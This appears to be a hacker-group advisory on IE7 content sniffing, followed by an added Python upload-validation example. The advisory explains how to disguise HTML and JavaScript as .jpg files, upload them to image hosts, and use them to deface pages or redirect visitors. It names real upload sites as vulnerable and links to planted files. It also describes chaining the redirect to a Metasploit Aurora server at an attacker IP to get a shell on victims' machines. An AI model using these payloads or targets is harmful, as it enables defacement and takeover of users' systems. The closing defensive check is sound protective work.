#############################################
#
# [+] IE 7 Java & Html Codes INJECTION
# [+] Discovered By 7H3 BoSs
#
#############################################
#
# [] Founder : [ 7H3 BoSs ]
# [] Members : [ ReZa , sub.z3l2o , Wishe ]
# [] Team    : [ KatRina iRanian Security Team ]
# [] Greetz  : [ ReZa , sub.z3l2o , Wishe , NEO ]
#
#############################################
#
# [+] HTML Exploit Example :
#
# Open a text document and insert HTML code in it, like this :
#
# <html>
# <head>
# <title>Hacked By KatRina Iranian Hackers</title>
# </head>
# <body bgcolor=black text=White>
# <center><h2>Hacked By KatRina Iranian Hackers</h2>
# <img src='http://www.gciran.com/services/graphic/star.jpg'>
# <br>
# <h2>We Are : </h2>
# <bR>
# <h2>ReZa , SuB zErO , Wishe , 7H3 BoSs</h2>
# </center></body>
# </html>
#
# Then save it in jpg format.
#
#############################################
#
# [+] JavaScript Exploit Example :
#
# Open a text document and insert JavaScript code in it, like this :
#
# <img src="" onError="document.location='http://google.com'">
#
# Then save it in jpg format.
#
#############################################
#
# [+] Introduction :
#
# Save the HTML code as a jpg, like KatRina.jpg,
# or insert JavaScript code and save it as a jpg file,
# then upload the image to a vulnerable image upload center.
# Remember, 30% of upload centers are vulnerable, but not all.
#
#############################################
#
# [+] HTML INJECTION :
#
# I created a text document, inserted HTML code in it, then saved it as jpg.
# My file name is Katrina.jpg, and I uploaded it to vulnerable upload centers.
#
# In this image upload center : http://datairan.gigfa.com/index.php
# Uploaded file : http://datairan.gigfa.com/files/axc0goer2hor9499need.jpg
# Note : open it in IE7 and you can see the HTML code injected.
#
# Another upload center : http://upload.mamazy.net
# Bypassed : http://upload.mamazy.net/images/oncljs8ef6qng40kily.jpg
#
# Another upload center : http://up.iranblog.com/
# Bypassed : http://up.iranblog.com/37261/1267616595.jpg
#
#############################################
#
# [+] JavaScript INJECTION :
#
# I created a text document, inserted JavaScript code in it, and saved it as jpg.
# My file name is KatRina.jpg and I inserted :
#
# <img src="" onError="document.location='http://google.com'">
#
# I saved it as jpg and uploaded it to a vulnerable upload center, and a victim
# with IE7 will be redirected to google.com !!!
# Example : http://up.iranblog.com/37261/1267642065.jpg
# Open it with IE7 and you will be redirected to http://google.com
# Note : this is an example and you can do many things with this.
# For instance, you can use the "Aurora" IE exploit in metasploit, serve it as
# http://yourIP:8080/ and do it like this :
#
# Open a text document and insert :
#
# <img src="" onError="document.location='http://yourIP:8080'">
#
# Then save it as jpg, upload it to a vulnerable image host and give the uploaded
# URL to the victim; he or she will be redirected to your exploit URL and you can
# gain a shell on the victim's system !!!
#
#############################################
#
# [+] Some vulnerable upload centers :
#
# http://up.iranblog.com/
# http://datairan.gigfa.com/index.php
# http://fuc.ir/
# http://upload.mamazy.net
#
#############################################
#
# [+] Note :
#
# You can do many things with this method and use many HTML or JavaScript codes, or both !
#
# ENJOY !
#
#############################################
#
# [+] Contact :
# i.The.l3oSs.i@Gmail.Com
#
#############################################
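
The files above render as pages because IE7 decides the type from the file's content rather than from its .jpg name. The following check is an added example, not part of the original advisory: it shows how an upload center can reject such files server-side by comparing magic bytes against the extension and scanning the first bytes for markup. The name check_upload, the marker list and the 256-byte window are assumptions of this example, and all sample inputs are constructed.

```python
import re

# Magic bytes that real image files start with.
IMAGE_MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
EXT_TO_MIME = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
               "png": "image/png", "gif": "image/gif"}

# Markup a content-sniffing browser may treat as HTML. Constructed list for
# this example, not Internet Explorer's exact table.
HTML_MARKERS = re.compile(
    rb"<\s*(html|head|body|title|script|img|iframe|table|plaintext)\b",
    re.IGNORECASE)
SNIFF_WINDOW = 256  # assumption: leading bytes a legacy sniffer inspects

# Constructed samples: the advisory's one-line payload saved as .jpg, a
# minimal JFIF header, and a JPEG header followed by markup.
SAMPLE_PAYLOAD = b"<img src=\"\" onError=\"document.location='http://google.com'\">"
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 64
SAMPLE_POLYGLOT = b"\xff\xd8\xff\xe0" + b"<html><body>x</body></html>"


def check_upload(filename, data):
    """Return (accepted, reason, response_headers) for an uploaded image."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    declared = EXT_TO_MIME.get(ext)
    if declared is None:
        return False, "extension not allowed", {}
    # The extension is attacker-chosen; the leading bytes must agree with it.
    if not data.startswith(IMAGE_MAGIC[declared]):
        return False, "content does not match extension", {}
    # A valid header followed by markup can still be sniffed as HTML.
    if HTML_MARKERS.search(data[:SNIFF_WINDOW]):
        return False, "markup inside sniffing window", {}
    # nosniff is honored by IE8 and later, not IE7, so the content checks
    # above remain the control for IE7 clients.
    headers = {"Content-Type": declared, "X-Content-Type-Options": "nosniff"}
    return True, "ok", headers


if __name__ == "__main__":
    for name, blob in [("KatRina.jpg", SAMPLE_PAYLOAD),
                       ("photo.jpg", SAMPLE_JPEG),
                       ("poly.jpg", SAMPLE_POLYGLOT)]:
        print(name, check_upload(name, blob)[:2])
```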